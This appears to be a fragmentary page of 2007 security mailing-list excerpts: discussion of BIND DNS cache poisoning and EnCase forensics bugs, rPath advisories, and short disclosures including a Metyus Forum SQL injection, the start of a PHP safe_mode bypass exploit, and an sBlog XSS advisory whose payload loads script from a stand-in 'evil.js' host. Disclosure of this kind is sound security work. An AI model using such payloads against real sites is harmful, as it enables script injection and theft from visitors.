On 24 Jul 2007 17:40:35 -, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
I don't exactly see how this is new News since Zalewski's paper on TCP
sequence number analysis (which included analysis of versions of BIND):
http://lcamtuf.coredump.cx/newtcp/
That article does not deal with attacks
they were able to identify six test scenarios, out of ?tens of thousands? of
test scenarios run
It only takes one. Plus this statement implies that its relatively hard to
crash EnCase; anyone thats used it on any regular basis knows that
crashing EnCase is on par with kicking retarded
On Fri, Jul 27, 2007 at 05:03:18AM +, jf wrote:
So here's some truth, you're a forensics software company, one that deals
by and large with LEO, which means you have an incredibly high bar to
fill, if you're application is not pristine, all sorts of 'bad people with
good lawyers (tm)' walk
# Bug Names : Metyus Forum Portal v1.0 philboard_forum.asp (id) Sql
#304;njection
# script name : Metyus Forum Portal
# For Example Page : http://users1.nofeehost.com/canavartepe/forum/philboard.asp
# Version : 1.0
# Risk : High
# Download : http://aspindir.com/indir.asp?id=3889
# Found By
rPath Security Advisory: 2007-0149-1
Published: 2007-07-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote System User Deterministic Weakness
Updated Versions:
bind=/[EMAIL PROTECTED]:devel//1/9.3.4_P1-0.1-1
bind-utils=/[EMAIL
This is Paul Vixie's response on this, when I asked him for verification:
-
this bug has been reported over and over again for a dozen years. it's
odd to have to keep fixing it-- i fixed it in bind4 and bind8 when theo
de raadt offered me his random number generator to use. bind9 should've
rPath Security Advisory: 2007-0150-1
Published: 2007-07-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
libvorbis=/[EMAIL PROTECTED]:devel//1/1.2.0-0.1-1
References:
iSEC Partners will be presenting our complete results from a research project
into the security of forensics software next week at the BlackHat USA
conference. The technical paper will be available before the talk at 4pm PST
on Wednesday, August 1st at
# sBlog 0.7.3 Beta XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn mail: [EMAIL PROTECTED]
# in blog
http://host/blog/search.php
# use
'//script src=http://yoursite.com/evil.js
# Welcome to the jungle!
On 24 Jul 2007 17:40:35 -, [EMAIL PROTECTED]
[EMAIL PROTECTED] wrote:
I don't exactly see how this is new News since Zalewski's paper on TCP =
sequence number analysis (which included analysis of versions of BIND):
http://lcamtuf.coredump.cx/newtcp/
That article does not deal with
On Thu, Jul 26, 2007 at 11:40:55PM -0500, Gadi Evron wrote:
This is Paul Vixie's response on this, when I asked him for verification:
-
this bug has been reported over and over again for a dozen years. it's
odd to have to keep fixing it-- i fixed it in bind4 and bind8 when theo
de
?php
#
### PHP Safe_mode bypass exploit (win32service) ###
### ###
### Note: Tested on 5.2.1 ###
### ###
### Author: NetJackal
A white paper about how to counter attack XSS attacks using AJAX
programming techniques
http://barmagy.com/blogs/infinite_loop/archive/2007/07/20/498.aspx
--
Fady Anwar
it's not like this hasn't been reported, and fixed, many times by many
others - so if it's fixed so many times, how come it was still vulnerable,
and ISC had to issue their patches?
Because its just a 16-bit field. DNS is broken. Cache poisoning will
happen. Those are the facts on the
Tim Newsham wrote:
it's not like this hasn't been reported, and fixed, many times by
many others - so if it's fixed so many times, how come it was still
vulnerable, and ISC had to issue their patches?
Because its just a 16-bit field. DNS is broken. Cache poisoning will
happen. Those are
Dear List,
This Message is thrown together in a hurry with limited Internet
access, please take my aplogise for typos and missing information,
more will follow soon :)
My call for an OSS Bluetooth sniffer during the last 23C3
in Berlin has not been left unanswered, first there was
Max
16 matches
Mail list logo